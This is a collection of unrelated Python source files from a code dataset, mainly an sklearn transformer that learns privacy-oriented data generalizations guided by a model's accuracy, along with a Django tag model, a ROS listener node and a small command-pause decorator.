self.output.write(pretty_record(record))
self.output.write('\n')
confirm = self.prompt('Really? [n]: ', required=False) or 'n'
if confirm[0] == 'y':
for i, choice in enumerate(records):
if choice == record:
del records[i]
else:
self.output.write("Ok, cancelled\n")
return records
self.edit_transaction(delete)
def raw_action(self):
try:
# PY3
output = self.output.buffer
except AttributeError:
output = self.output
output.write(encode(self.read_records()))
| StarcoderdataPython |
1727322 | <filename>apt/minimization/minimizer.py<gh_stars>10-100
"""
This module implements all classes needed to perform data minimization
"""
from typing import Union
import pandas as pd
import numpy as np
import copy
import sys
from scipy.spatial import distance
from sklearn.base import BaseEstimator, TransformerMixin, MetaEstimatorMixin
from sklearn.compose import ColumnTransformer
from sklearn.impute import SimpleImputer
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import OneHotEncoder
from sklearn.utils.validation import check_X_y, check_array, check_is_fitted
from sklearn.tree import DecisionTreeClassifier
from sklearn.model_selection import train_test_split
class GeneralizeToRepresentative(BaseEstimator, MetaEstimatorMixin, TransformerMixin):
""" A transformer that generalizes data to representative points.
Learns data generalizations based on an original model's predictions
and a target accuracy. Once the generalizations are learned, can
receive one or more data records and transform them to representative
points based on the learned generalization.
An alternative way to use the transformer is to supply ``cells`` and
``features`` in init or set_params and those will be used to transform
data to representatives. In this case, fit must still be called but
there is no need to supply it with ``X`` and ``y``, and there is no
need to supply an existing ``estimator`` to init.
In summary, either ``estimator`` and ``target_accuracy`` should be
supplied or ``cells`` and ``features`` should be supplied.
Parameters
----------
estimator : estimator, optional
The original model for which generalization is being performed.
Should be pre-fitted.
target_accuracy : float, optional
The required accuracy when applying the base model to the
generalized data. Accuracy is measured relative to the original
accuracy of the model.
features : list of str, optional
The feature names, in the order that they appear in the data.
categorical_features: list of str, optional
The list of categorical features should only be supplied when
passing data as a pandas dataframe.
features_to_minimize: List of str or numbers, optional
The features that need to be minimized in case of pandas data,
and indexes of features in case of numpy data.
cells : list of object, optional
The cells used to generalize records. Each cell must define a
range or subset of categories for each feature, as well as a
representative value for each feature.
This parameter should be used when instantiating a transformer
object without first fitting it.
train_only_QI : Bool, optional
The required method to train data set for minimizing. Default is
to train the tree just on the features that are given as
features_to_minimize.
Attributes
----------
cells_ : list of object
The cells used to generalize records, as learned when calling fit.
ncp_ : float
The NCP (information loss) score of the resulting generalization,
as measured on the training data.
generalizations_ : object
The generalizations that were learned (actual feature ranges).
Notes
-----
"""
def __init__(self, estimator=None, target_accuracy=0.998, features=None,
cells=None, categorical_features=None, features_to_minimize: Union[np.ndarray, list] = None
, train_only_QI=True):
self.estimator = estimator
self.target_accuracy = target_accuracy
self.features = features
self.cells = cells
self.categorical_features = []
if categorical_features:
self.categorical_features = categorical_features
self.features_to_minimize = features_to_minimize
self.train_only_QI = train_only_QI
def get_params(self, deep=True):
"""Get parameters for this estimator.
Parameters
----------
deep : boolean, optional
If True, will return the parameters for this estimator and contained
subobjects that are estimators.
Returns
-------
params : mapping of string to any
Parameter names mapped to their values.
"""
ret = {}
ret['target_accuracy'] = self.target_accuracy
if deep:
ret['features'] = copy.deepcopy(self.features)
ret['cells'] = copy.deepcopy(self.cells)
ret['estimator'] = self.estimator
else:
ret['features'] = copy.copy(self.features)
ret['cells'] = copy.copy(self.cells)
return ret
def set_params(self, **params):
"""Set the parameters of this estimator.
Returns
-------
self : object
Returns self.
"""
if 'target_accuracy' in params:
self.target_accuracy = params['target_accuracy']
if 'features' in params:
self.features = params['features']
if 'cells' in params:
self.cells = params['cells']
return self
@property
def generalizations(self):
return self.generalizations_
def fit_transform(self, X: Union[np.ndarray, pd.DataFrame] = None, y: Union[np.ndarray, pd.DataFrame] = None):
"""Learns the generalizations based on training data, and applies them to the data.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features), optional
The training input samples.
y : array-like, shape (n_samples,), optional
The target values. An array of int.
This should contain the predictions of the original model on ``X``.
Returns
-------
X_transformed : numpy or pandas according to the input type, shape (n_samples, n_features)
The array containing the representative values to which each record in
``X`` is mapped.
"""
self.fit(X, y)
return self.transform(X)
def fit(self, X: Union[np.ndarray, pd.DataFrame] = None, y: Union[np.ndarray, pd.DataFrame] = None):
"""Learns the generalizations based on training data.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features), optional
The training input samples.
y : array-like, shape (n_samples,), optional
The target values. An array of int.
This should contain the predictions of the original model on ``X``.
Returns
-------
X_transformed : numpy or pandas according to the input type, shape (n_samples, n_features)
The array containing the representative values to which each record in
``X`` is mapped.
"""
# take into account that estimator, X, y, cells, features may be None
if X is not None:
if type(X) == np.ndarray:
self.is_numpy = True
else:
self.is_numpy = False
if X is not None and y is not None:
if self.is_numpy:
X, y = check_X_y(X, y, accept_sparse=True)
self.n_features_ = X.shape[1]
elif self.features:
self.n_features_ = len(self.features)
else:
self.n_features_ = 0
if self.features:
self._features = self.features
# if features is None, use numbers instead of names
elif self.n_features_ != 0:
self._features = [i for i in range(self.n_features_)]
else:
self._features = None
if self.cells:
self.cells_ = self.cells
else:
self.cells_ = {}
self.categorical_values = {}
# Going to fit
# (currently not dealing with option to fit with only X and y and no estimator)
if self.estimator and X is not None and y is not None:
if self.is_numpy:
if not self.features_to_minimize:
self.features_to_minimize = [i for i in range(len(self._features))]
x_QI = X[:, self.features_to_minimize]
self.features_to_minimize = [self._features[i] for i in self.features_to_minimize]
X = pd.DataFrame(X, columns=self._features)
else:
if not self.features_to_minimize:
self.features_to_minimize = self._features
x_QI = X.loc[:, self.features_to_minimize]
x_QI = pd.DataFrame(x_QI, columns=self.features_to_minimize)
# divide dataset into train and test
used_data = X
if self.train_only_QI:
used_data = x_QI
X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y,
test_size=0.4,
random_state=18)
X_train_QI = X_train.loc[:, self.features_to_minimize]
X_test_QI = X_test.loc[:, self.features_to_minimize]
used_X_train = X_train
if self.train_only_QI:
used_X_train = X_train_QI
# collect feature data (such as min, max)
feature_data = {}
for feature in self._features:
if feature not in feature_data.keys():
fd = {}
values = list(X.loc[:, feature])
if feature not in self.categorical_features:
fd['min'] = min(values)
fd['max'] = max(values)
fd['range'] = max(values) - min(values)
else:
fd['range'] = len(values)
feature_data[feature] = fd
# prepare data for DT
categorical_features = [f for f in self._features if f in self.categorical_features and
f in self.features_to_minimize]
numeric_transformer = Pipeline(
steps=[('imputer', SimpleImputer(strategy='constant', fill_value=0))]
)
numeric_features = [f for f in self._features if f not in self.categorical_features and
f in self.features_to_minimize]
categorical_transformer = OneHotEncoder(handle_unknown="ignore", sparse=False)
preprocessor_QI_features = ColumnTransformer(
transformers=[
("num", numeric_transformer, numeric_features),
("cat", categorical_transformer, categorical_features),
]
)
preprocessor_QI_features.fit(x_QI)
# preprocessor to fit data that have features not included in QI (to get accuracy)
numeric_features = [f for f in self._features if f not in self.categorical_features]
numeric_transformer = Pipeline(
steps=[('imputer', SimpleImputer(strategy='constant', fill_value=0))]
)
categorical_transformer = OneHotEncoder(handle_unknown="ignore", sparse=False)
preprocessor = ColumnTransformer(
transformers=[
("num", numeric_transformer, numeric_features),
("cat", categorical_transformer, self.categorical_features),
]
)
preprocessor.fit(X)
x_prepared = preprocessor.transform(X_train)
if self.train_only_QI:
x_prepared = preprocessor_QI_features.transform(X_train_QI)
self._preprocessor = preprocessor
self.cells_ = {}
self.dt_ = DecisionTreeClassifier(random_state=0, min_samples_split=2,
min_samples_leaf=1)
self.dt_.fit(x_prepared, y_train)
self._modify_categorical_features(used_data)
x_prepared = pd.DataFrame(x_prepared, columns=self.categorical_data.columns)
self._calculate_cells()
self._modify_cells()
# features that are not from QI should not be part of generalizations
for feature in self._features:
if feature not in self.features_to_minimize:
self._remove_feature_from_cells(self.cells_, self.cells_by_id_, feature)
nodes = self._get_nodes_level(0)
self._attach_cells_representatives(x_prepared, used_X_train, y_train, nodes)
# self.cells_ currently holds the generalization created from the tree leaves
self._calculate_generalizations()
# apply generalizations to test data
x_prepared_test = preprocessor.transform(X_test)
if self.train_only_QI:
x_prepared_test = preprocessor_QI_features.transform(X_test_QI)
x_prepared_test = pd.DataFrame(x_prepared_test, index=X_test.index, columns=self.categorical_data.columns)
generalized = self._generalize(X_test, x_prepared_test, nodes, self.cells_, self.cells_by_id_)
# check accuracy
accuracy = self.estimator.score(preprocessor.transform(generalized), y_test)
print('Initial accuracy of model on generalized data, relative to original model predictions '
'(base generalization derived from tree, before improvements): %f' % accuracy)
# if accuracy above threshold, improve generalization
if accuracy > self.target_accuracy:
print('Improving generalizations')
level = 1
while accuracy > self.target_accuracy:
try:
cells_previous_iter = self.cells_
generalization_prev_iter = self.generalizations_
cells_by_id_prev = self.cells_by_id_
nodes = self._get_nodes_level(level)
self._calculate_level_cells(level)
self._attach_cells_representatives(x_prepared, used_X_train, y_train, nodes)
self._calculate_generalizations()
generalized = self._generalize(X_test, x_prepared_test, nodes, self.cells_,
self.cells_by_id_)
accuracy = self.estimator.score(preprocessor.transform(generalized), y_test)
# if accuracy passed threshold roll back to previous iteration generalizations
if accuracy < self.target_accuracy:
self.cells_ = cells_previous_iter
self.generalizations_ = generalization_prev_iter
self.cells_by_id_ = cells_by_id_prev
break
else:
print('Pruned tree to level: %d, new relative accuracy: %f' % (level, accuracy))
level += 1
except Exception as e:
print(e)
break
# if accuracy below threshold, improve accuracy by removing features from generalization
elif accuracy < self.target_accuracy:
print('Improving accuracy')
while accuracy < self.target_accuracy:
removed_feature = self._remove_feature_from_generalization(X_test, x_prepared_test,
nodes, y_test,
feature_data, accuracy)
if removed_feature is None:
break
self._calculate_generalizations()
generalized = self._generalize(X_test, x_prepared_test, nodes, self.cells_, self.cells_by_id_)
accuracy = self.estimator.score(preprocessor.transform(generalized), y_test)
print('Removed feature: %s, new relative accuracy: %f' % (removed_feature, accuracy))
# self.cells_ currently holds the chosen generalization based on target accuracy
# calculate iLoss
self.ncp_ = self._calculate_ncp(X_test, self.generalizations_, feature_data)
# Return the transformer
return self
def transform(self, X: Union[np.ndarray, pd.DataFrame]):
""" Transforms data records to representative points.
Parameters
----------
X : {array-like, sparse-matrix}, shape (n_samples, n_features), If provided as a pandas dataframe,
may contain both numeric and categorical data.
The input samples.
Returns
-------
X_transformed : numpy or pandas according to the input type, shape (n_samples, n_features)
The array containing the representative values to which each record in
``X`` is mapped.
"""
# Check if fit has been called
msg = 'This %(name)s instance is not initialized yet. ' \
'Call ‘fit’ or ‘set_params’ with ' \
'appropriate arguments before using this method.'
check_is_fitted(self, ['cells', 'features'], msg=msg)
if type(X) == np.ndarray:
# Input validation
X = check_array(X, accept_sparse=True)
self.is_numpy = True
X = pd.DataFrame(X, columns=self._features)
else:
self.is_numpy = False
if X.shape[1] != self.n_features_ and self.n_features_ != 0:
raise ValueError('Shape of input is different from what was seen'
'in `fit`')
if not self._features:
self._features = [i for i in range(X.shape[1])]
representatives = pd.DataFrame(columns=self._features) # only columns
generalized = pd.DataFrame(X, columns=self._features, copy=True) # original data
mapped = np.zeros(X.shape[0]) # to mark records we already mapped
# iterate over cells (leaves in decision tree)
for i in range(len(self.cells_)):
# Copy the representatives from the cells into another data structure:
# iterate over features in test data
for feature in self._features:
# if feature has a representative value in the cell and should not
# be left untouched, take the representative value
if feature in self.cells_[i]['representative'] and \
('untouched' not in self.cells_[i]
or feature not in self.cells_[i]['untouched']):
representatives.loc[i, feature] = self.cells_[i]['representative'][feature]
# else, drop the feature (removes from representatives columns that
# do not have a representative value or should remain untouched)
elif feature in representatives.columns.tolist():
representatives = representatives.drop(feature, axis=1)
# get the indexes of all records that map to this cell
indexes = self._get_record_indexes_for_cell(X, self.cells_[i], mapped)
# replace the values in the representative columns with the representative
# values (leaves others untouched)
if indexes and not representatives.columns.empty:
if len(indexes) > 1:
replace = pd.concat([representatives.loc[i].to_frame().T] * len(indexes)).reset_index(drop=True)
else:
replace = representatives.loc[i].to_frame().T.reset_index(drop=True)
replace.index = indexes
generalized.loc[indexes, representatives.columns] = replace
if self.is_numpy:
return generalized.to_numpy()
return generalized
def _get_record_indexes_for_cell(self, X, cell, mapped):
indexes = []
for index, row in X.iterrows():
if not mapped.item(index) and self._cell_contains(cell, row, index, mapped):
indexes.append(index)
return indexes
def _cell_contains(self, cell, x, i, mapped):
for f in self._features:
if f in cell['ranges']:
if not self._cell_contains_numeric(f, cell['ranges'][f], x):
return False
elif f in cell['categories']:
if not self._cell_contains_categorical(f, cell['categories'][f], x):
return False
elif f in cell['untouched']:
continue
else:
raise TypeError("feature " + f + "not found in cell" + cell['id'])
# Mark as mapped
mapped.itemset(i, 1)
return True
def _modify_categorical_features(self, X):
self.categorical_values = {}
self.oneHotVectorFeaturesToFeatures = {}
features_to_remove = []
used_features = self._features
if self.train_only_QI:
used_features = self.features_to_minimize
for feature in self.categorical_features:
if feature in used_features:
try:
all_values = X.loc[:, feature]
values = list(all_values.unique())
self.categorical_values[feature] = values
X[feature] = pd.Categorical(X.loc[:, feature], categories=values, ordered=False)
ohe = pd.get_dummies(X[feature], prefix=feature)
for oneHotVectorFeature in ohe.columns:
self.oneHotVectorFeaturesToFeatures[oneHotVectorFeature] = feature
X = pd.concat([X, ohe], axis=1)
features_to_remove.append(feature)
except KeyError:
print("feature " + feature + "not found in training data")
self.categorical_data = X.drop(features_to_remove, axis=1)
def _cell_contains_numeric(self, f, range, x):
i = self._features.index(f)
# convert x to ndarray to allow indexing
a = np.array(x)
value = a.item(i)
if range['start']:
if value <= range['start']:
return False
if range['end']:
if value > range['end']:
return False
return True
def _cell_contains_categorical(self, f, range, x):
i = self._features.index(f)
# convert x to ndarray to allow indexing
a = np.array(x)
value = a.item(i)
if value in range:
return True
return False
def _calculate_cells(self):
self.cells_by_id_ = {}
self.cells_ = self._calculate_cells_recursive(0)
def _calculate_cells_recursive(self, node):
feature_index = self.dt_.tree_.feature[node]
if feature_index == -2:
# this is a leaf
label = self._calculate_cell_label(node)
hist = [int(i) for i in self.dt_.tree_.value[node][0]]
cell = {'label': label, 'hist': hist, 'ranges': {}, 'id': int(node)}
return [cell]
cells = []
feature = self.categorical_data.columns[feature_index]
threshold = self.dt_.tree_.threshold[node]
left_child = self.dt_.tree_.children_left[node]
right_child = self.dt_.tree_.children_right[node]
left_child_cells = self._calculate_cells_recursive(left_child)
for cell in left_child_cells:
if feature not in cell['ranges'].keys():
cell['ranges'][feature] = {'start': None, 'end': None}
if cell['ranges'][feature]['end'] is None:
cell['ranges'][feature]['end'] = threshold
cells.append(cell)
self.cells_by_id_[cell['id']] = cell
right_child_cells = self._calculate_cells_recursive(right_child)
for cell in right_child_cells:
if feature not in cell['ranges'].keys():
cell['ranges'][feature] = {'start': None, 'end': None}
if cell['ranges'][feature]['start'] is None:
cell['ranges'][feature]['start'] = threshold
cells.append(cell)
self.cells_by_id_[cell['id']] = cell
return cells
def _calculate_cell_label(self, node):
label_hist = self.dt_.tree_.value[node][0]
return int(self.dt_.classes_[np.argmax(label_hist)])
def _modify_cells(self):
cells = []
features = self.categorical_data.columns
for cell in self.cells_:
new_cell = {'id': cell['id'], 'label': cell['label'], 'ranges': {}, 'categories': {}, 'hist': cell['hist'],
'representative': None}
for feature in features:
if feature in self.oneHotVectorFeaturesToFeatures.keys():
# feature is categorical and should be mapped
categorical_feature = self.oneHotVectorFeaturesToFeatures[feature]
if categorical_feature not in new_cell['categories'].keys():
new_cell['categories'][categorical_feature] = self.categorical_values[
categorical_feature].copy()
if feature in cell['ranges'].keys():
categorical_value = feature[len(categorical_feature) + 1:]
if cell['ranges'][feature]['start'] is not None:
# categorical feature must have this value
new_cell['categories'][categorical_feature] = [categorical_value]
else:
# categorical feature can not have this value
if categorical_value in new_cell['categories'][categorical_feature]:
new_cell['categories'][categorical_feature].remove(categorical_value)
else:
if feature in cell['ranges'].keys():
new_cell['ranges'][feature] = cell['ranges'][feature]
else:
new_cell['ranges'][feature] = {'start': None, 'end': None}
cells.append(new_cell)
self.cells_by_id_[new_cell['id']] = new_cell
self.cells_ = cells
def _calculate_level_cells(self, level):
if level < 0 or level > self.dt_.get_depth():
raise TypeError("Illegal level %d' % level", level)
if level > 0:
new_cells = []
new_cells_by_id = {}
nodes = self._get_nodes_level(level)
if nodes:
for node in nodes:
if self.dt_.tree_.feature[node] == -2: # leaf node
new_cell = self.cells_by_id_[node]
else:
left_child = self.dt_.tree_.children_left[node]
right_child = self.dt_.tree_.children_right[node]
left_cell = self.cells_by_id_[left_child]
right_cell = self.cells_by_id_[right_child]
new_cell = {'id': int(node), 'ranges': {}, 'categories': {}, 'untouched': [],
'label': None, 'representative': None}
for feature in left_cell['ranges'].keys():
new_cell['ranges'][feature] = {}
new_cell['ranges'][feature]['start'] = left_cell['ranges'][feature]['start']
new_cell['ranges'][feature]['end'] = right_cell['ranges'][feature]['start']
for feature in left_cell['categories'].keys():
new_cell['categories'][feature] = \
list(set(left_cell['categories'][feature]) |
set(right_cell['categories'][feature]))
for feature in left_cell['untouched']:
if feature in right_cell['untouched']:
new_cell['untouched'].append(feature)
self._calculate_level_cell_label(left_cell, right_cell, new_cell)
new_cells.append(new_cell)
new_cells_by_id[new_cell['id']] = new_cell
self.cells_ = new_cells
self.cells_by_id_ = new_cells_by_id
# else: nothing to do, stay with previous cells
def _calculate_level_cell_label(self, left_cell, right_cell, new_cell):
new_cell['hist'] = [x + y for x, y in zip(left_cell['hist'], right_cell['hist'])]
new_cell['label'] = int(self.dt_.classes_[np.argmax(new_cell['hist'])])
def _get_nodes_level(self, level):
# level = distance from lowest leaf
node_depth = np.zeros(shape=self.dt_.tree_.node_count, dtype=np.int64)
is_leaves = np.zeros(shape=self.dt_.tree_.node_count, dtype=bool)
stack = [(0, -1)] # seed is the root node id and its parent depth
while len(stack) > 0:
node_id, parent_depth = stack.pop()
# depth = distance from root
node_depth[node_id] = parent_depth + 1
if self.dt_.tree_.children_left[node_id] != self.dt_.tree_.children_right[node_id]:
stack.append((self.dt_.tree_.children_left[node_id], parent_depth + 1))
stack.append((self.dt_.tree_.children_right[node_id], parent_depth + 1))
else:
is_leaves[node_id] = True
# depth of entire tree
max_depth = max(node_depth)
# depth of current level
depth = max_depth - level
# level is higher than root
if depth < 0:
return None
# return all nodes with depth == level or leaves higher than level
return [i for i, x in enumerate(node_depth) if x == depth or (x < depth and is_leaves[i])]
def _attach_cells_representatives(self, prepared_data, originalTrainFeatures, labelFeature, level_nodes):
# prepared data include one hot encoded categorical data,
# if there is no categorical data prepared data is original data
nodeIds = self._find_sample_nodes(prepared_data, level_nodes)
labels_df = pd.DataFrame(labelFeature, columns=['label'])
for cell in self.cells_:
cell['representative'] = {}
# get all rows in cell
indexes = [i for i, x in enumerate(nodeIds) if x == cell['id']]
original_rows = originalTrainFeatures.iloc[indexes]
sample_rows = prepared_data.iloc[indexes]
sample_labels = labels_df.iloc[indexes]['label'].values.tolist()
# get rows with matching label
indexes = [i for i, label in enumerate(sample_labels) if label == cell['label']]
match_samples = sample_rows.iloc[indexes]
match_rows = original_rows.iloc[indexes]
# find the "middle" of the cluster
array = match_samples.values
# Only works with numpy 1.9.0 and higher!!!
median = np.median(array, axis=0)
i = 0
min = len(array)
min_dist = float("inf")
for row in array:
dist = distance.euclidean(row, median)
if dist < min_dist:
min_dist = dist
min = i
i = i + 1
row = match_rows.iloc[min]
for feature in cell['ranges'].keys():
cell['representative'][feature] = row[feature]
for feature in cell['categories'].keys():
cell['representative'][feature] = row[feature]
def _find_sample_nodes(self, samples, nodes):
paths = self.dt_.decision_path(samples).toarray()
nodeSet = set(nodes)
return [(list(set([i for i, v in enumerate(p) if v == 1]) & nodeSet))[0] for p in paths]
def _generalize(self, original_data, prepared_data, level_nodes, cells, cells_by_id):
# prepared data include one hot encoded categorical data + QI
representatives = pd.DataFrame(columns=self._features) # empty except for columns
generalized = pd.DataFrame(prepared_data, columns=self.categorical_data.columns, copy=True)
original_data_generalized = pd.DataFrame(original_data, columns=self._features, copy=True)
mapping_to_cells = self._map_to_cells(generalized, level_nodes, cells_by_id)
# iterate over cells (leaves in decision tree)
for i in range(len(cells)):
# This code just copies the representatives from the cells into another data structure
# iterate over features
for feature in self._features:
# if feature has a representative value in the cell and should not be left untouched,
# take the representative value
if feature in cells[i]['representative'] and ('untouched' not in cells[i] or
feature not in cells[i]['untouched']):
representatives.loc[i, feature] = cells[i]['representative'][feature]
# else, drop the feature (removes from representatives columns that do not have a
# representative value or should remain untouched)
elif feature in representatives.columns.tolist():
representatives = representatives.drop(feature, axis=1)
# get the indexes of all records that map to this cell
indexes = [j for j in mapping_to_cells if mapping_to_cells[j]['id'] == cells[i]['id']]
# replaces the values in the representative columns with the representative values
# (leaves others untouched)
if indexes and not representatives.columns.empty:
if len(indexes) > 1:
replace = pd.concat([representatives.loc[i].to_frame().T] * len(indexes)).reset_index(drop=True)
else:
replace = representatives.loc[i].to_frame().T.reset_index(drop=True)
replace.index = indexes
replace = pd.DataFrame(replace, indexes, columns=self._features)
original_data_generalized.loc[indexes, representatives.columns.tolist()] = replace
return original_data_generalized
def _map_to_cells(self, samples, nodes, cells_by_id):
mapping_to_cells = {}
for index, row in samples.iterrows():
cell = self._find_sample_cells([row], nodes, cells_by_id)[0]
mapping_to_cells[index] = cell
return mapping_to_cells
def _find_sample_cells(self, samples, nodes, cells_by_id):
node_ids = self._find_sample_nodes(samples, nodes)
return [cells_by_id[nodeId] for nodeId in node_ids]
def _remove_feature_from_generalization(self, original_data, prepared_data, nodes, labels, feature_data,
current_accuracy):
# prepared data include one hot encoded categorical data,
# if there is no categorical data prepared data is original data
feature = self._get_feature_to_remove(original_data, prepared_data, nodes, labels, feature_data,
current_accuracy)
if feature is None:
return None
GeneralizeToRepresentative._remove_feature_from_cells(self.cells_, self.cells_by_id_, feature)
return feature
def _get_feature_to_remove(self, original_data, prepared_data, nodes, labels, feature_data, current_accuracy):
# prepared data include one hot encoded categorical data,
# if there is no categorical data prepared data is original data
# We want to remove features with low iLoss (NCP) and high accuracy gain
# (after removing them)
ranges = self.generalizations_['ranges']
range_counts = self._find_range_count(original_data, ranges)
total = prepared_data.size
range_min = sys.float_info.max
remove_feature = None
categories = self.generalizations['categories']
category_counts = self._find_categories_count(original_data, categories)
for feature in ranges.keys():
if feature not in self.generalizations_['untouched']:
feature_ncp = self._calc_ncp_numeric(ranges[feature],
range_counts[feature],
feature_data[feature],
total)
if feature_ncp > 0:
# divide by accuracy gain
new_cells = copy.deepcopy(self.cells_)
cells_by_id = copy.deepcopy(self.cells_by_id_)
GeneralizeToRepresentative._remove_feature_from_cells(new_cells, cells_by_id, feature)
generalized = self._generalize(original_data, prepared_data, nodes, new_cells, cells_by_id)
accuracy_gain = self.estimator.score(self._preprocessor.transform(generalized),
labels) - current_accuracy
if accuracy_gain < 0:
accuracy_gain = 0
if accuracy_gain != 0:
feature_ncp = feature_ncp / accuracy_gain
if feature_ncp < range_min:
range_min = feature_ncp
remove_feature = feature
for feature in categories.keys():
if feature not in self.generalizations['untouched']:
feature_ncp = self._calc_ncp_categorical(categories[feature],
category_counts[feature],
feature_data[feature],
total)
if feature_ncp > 0:
# divide by accuracy loss
new_cells = copy.deepcopy(self.cells_)
cells_by_id = copy.deepcopy(self.cells_by_id_)
GeneralizeToRepresentative._remove_feature_from_cells(new_cells, cells_by_id, feature)
generalized = self._generalize(original_data, prepared_data, nodes, new_cells, cells_by_id)
accuracy_gain = self.estimator.score(self._preprocessor.transform(generalized),
labels) - current_accuracy
if accuracy_gain < 0:
accuracy_gain = 0
if accuracy_gain != 0:
feature_ncp = feature_ncp / accuracy_gain
if feature_ncp < range_min:
range_min = feature_ncp
remove_feature = feature
print('feature to remove: ' + (str(remove_feature) if remove_feature is not None else 'none'))
return remove_feature
def _calculate_generalizations(self):
self.generalizations_ = {'ranges': GeneralizeToRepresentative._calculate_ranges(self.cells_),
'categories': GeneralizeToRepresentative._calculate_categories(self.cells_),
'untouched': GeneralizeToRepresentative._calculate_untouched(self.cells_)}
def _find_range_count(self, samples, ranges):
samples_df = pd.DataFrame(samples, columns=self.categorical_data.columns)
range_counts = {}
last_value = None
for r in ranges.keys():
range_counts[r] = []
# if empty list, all samples should be counted
if not ranges[r]:
range_counts[r].append(samples_df.shape[0])
else:
for value in ranges[r]:
counter = [item for item in samples_df[r] if int(item) <= value]
range_counts[r].append(len(counter))
last_value = value
counter = [item for item in samples_df[r] if int(item) <= last_value]
range_counts[r].append(len(counter))
return range_counts
def _find_categories_count(self, samples, categories):
category_counts = {}
for c in categories.keys():
category_counts[c] = []
for value in categories[c]:
category_counts[c].append(len(samples.loc[samples[c].isin(value)]))
return category_counts
def _calculate_ncp(self, samples, generalizations, feature_data):
# supressed features are already taken care of within _calc_ncp_numeric
ranges = generalizations['ranges']
categories = generalizations['categories']
range_counts = self._find_range_count(samples, ranges)
category_counts = self._find_categories_count(samples, categories)
total = samples.shape[0]
total_ncp = 0
total_features = len(generalizations['untouched'])
for feature in ranges.keys():
feature_ncp = self._calc_ncp_numeric(ranges[feature], range_counts[feature],
feature_data[feature], total)
total_ncp = total_ncp + feature_ncp
total_features += 1
for feature in categories.keys():
featureNCP = self._calc_ncp_categorical(categories[feature], category_counts[feature],
feature_data[feature],
total)
total_ncp = total_ncp + featureNCP
total_features += 1
if total_features == 0:
return 0
return total_ncp / total_features
@staticmethod
def _calculate_ranges(cells):
ranges = {}
for cell in cells:
for feature in [key for key in cell['ranges'].keys() if
'untouched' not in cell or key not in cell['untouched']]:
if feature not in ranges.keys():
ranges[feature] = []
if cell['ranges'][feature]['start'] is not None:
ranges[feature].append(cell['ranges'][feature]['start'])
if cell['ranges'][feature]['end'] is not None:
ranges[feature].append(cell['ranges'][feature]['end'])
for feature in ranges.keys():
ranges[feature] = list(set(ranges[feature]))
ranges[feature].sort()
return ranges
@staticmethod
def _calculate_categories(cells):
categories = {}
categorical_features_values = GeneralizeToRepresentative._calculate_categorical_features_values(cells)
for feature in categorical_features_values.keys():
partitions = []
values = categorical_features_values[feature]
assigned = []
for i in range(len(values)):
value1 = values[i]
if value1 in assigned:
continue
partition = [value1]
assigned.append(value1)
for j in range(len(values)):
if j <= i:
continue
value2 = values[j]
if GeneralizeToRepresentative._are_inseparable(cells, feature, value1, value2):
partition.append(value2)
assigned.append(value2)
partitions.append(partition)
categories[feature] = partitions
return categories
@staticmethod
def _calculate_categorical_features_values(cells):
categorical_features_values = {}
for cell in cells:
for feature in [key for key in cell['categories'].keys() if
'untouched' not in cell or key not in cell['untouched']]:
if feature not in categorical_features_values.keys():
categorical_features_values[feature] = []
for value in cell['categories'][feature]:
if value not in categorical_features_values[feature]:
categorical_features_values[feature].append(value)
return categorical_features_values
@staticmethod
def _are_inseparable(cells, feature, value1, value2):
for cell in cells:
if feature not in cell['categories'].keys():
continue
value1_in = value1 in cell['categories'][feature]
value2_in = value2 in cell['categories'][feature]
if value1_in != value2_in:
return False
return True
@staticmethod
def _calculate_untouched(cells):
untouched_lists = [cell['untouched'] if 'untouched' in cell else [] for cell in cells]
untouched = set(untouched_lists[0])
untouched = untouched.intersection(*untouched_lists)
return list(untouched)
@staticmethod
def _calc_ncp_categorical(categories, categoryCount, feature_data, total):
category_sizes = [len(g) if len(g) > 1 else 0 for g in categories]
normalized_category_sizes = [s * n / total for s, n in zip(category_sizes, categoryCount)]
average_group_size = sum(normalized_category_sizes) / len(normalized_category_sizes)
return average_group_size / feature_data['range'] # number of values in category
@staticmethod
def _calc_ncp_numeric(feature_range, range_count, feature_data, total):
# if there are no ranges, feature is supressed and iLoss is 1
if not feature_range:
return 1
# range only contains the split values, need to add min and max value of feature
# to enable computing sizes of all ranges
new_range = [feature_data['min']] + feature_range + [feature_data['max']]
range_sizes = [b - a for a, b in zip(new_range[::1], new_range[1::1])]
normalized_range_sizes = [s * n / total for s, n in zip(range_sizes, range_count)]
average_range_size = sum(normalized_range_sizes) / len(normalized_range_sizes)
return average_range_size / (feature_data['max'] - feature_data['min'])
@staticmethod
def _remove_feature_from_cells(cells, cells_by_id, feature):
for cell in cells:
if 'untouched' not in cell:
cell['untouched'] = []
if feature in cell['ranges'].keys():
del cell['ranges'][feature]
elif feature in cell['categories'].keys():
del cell['categories'][feature]
cell['untouched'].append(feature)
cells_by_id[cell['id']] = cell.copy()
| StarcoderdataPython |
3309040 | # -*- encoding: utf-8 -*-
'''
Created on 2012-3-22
@author: Neil
'''
from django.db import models
class Tag(models.Model):
"""
标签的数据模型
"""
name = models.CharField(max_length=20, unique=True)
used_count = models.IntegerField(default=1)
# created_at = models.DateTimeField(default=datetime.datetime.now())
created_at = models.DateTimeField(auto_now_add=True)
def __unicode__(self):
return self.name
class Meta:
ordering = ['id']
app_label = 'glow'
| StarcoderdataPython |
1642012 | #!/usr/bin/env python3
'''
@file listener.py
@package py3_listner
@author CVH95
@email <EMAIL>
@brief Fibonacci listener
Copyright (C) 2021 MIT License
'''
import rospy
from std_msgs.msg import *
class Listener:
def __init__(self):
self.fibonacci = 0
self.subscriber = rospy.Subscriber(
'innosold/process/layer', Int64, self.callback)
rospy.on_shutdown(self.close)
def callback(self, msg):
self.fibonacci = msg.data
rospy.loginfo('Fibonacci value: %d' % self.fibonacci)
def close(self):
print('\nLast value received: %d' % self.fibonacci)
| StarcoderdataPython |
36138 | """Pauses the execution."""
import time
from dodo_commands.framework.decorator_utils import uses_decorator
class Decorator:
def is_used(self, config, command_name, decorator_name):
return uses_decorator(config, command_name, decorator_name)
def add_arguments(self, parser): # override
parser.add_argument(
"--pause-ms", type=int, help="Pause in milliseconds before continuing"
)
def modify_args(self, command_line_args, args_tree_root_node, cwd): # override
if getattr(command_line_args, "pause_ms", 0):
time.sleep(command_line_args.pause_ms / 1000)
return args_tree_root_node, cwd
| StarcoderdataPython |
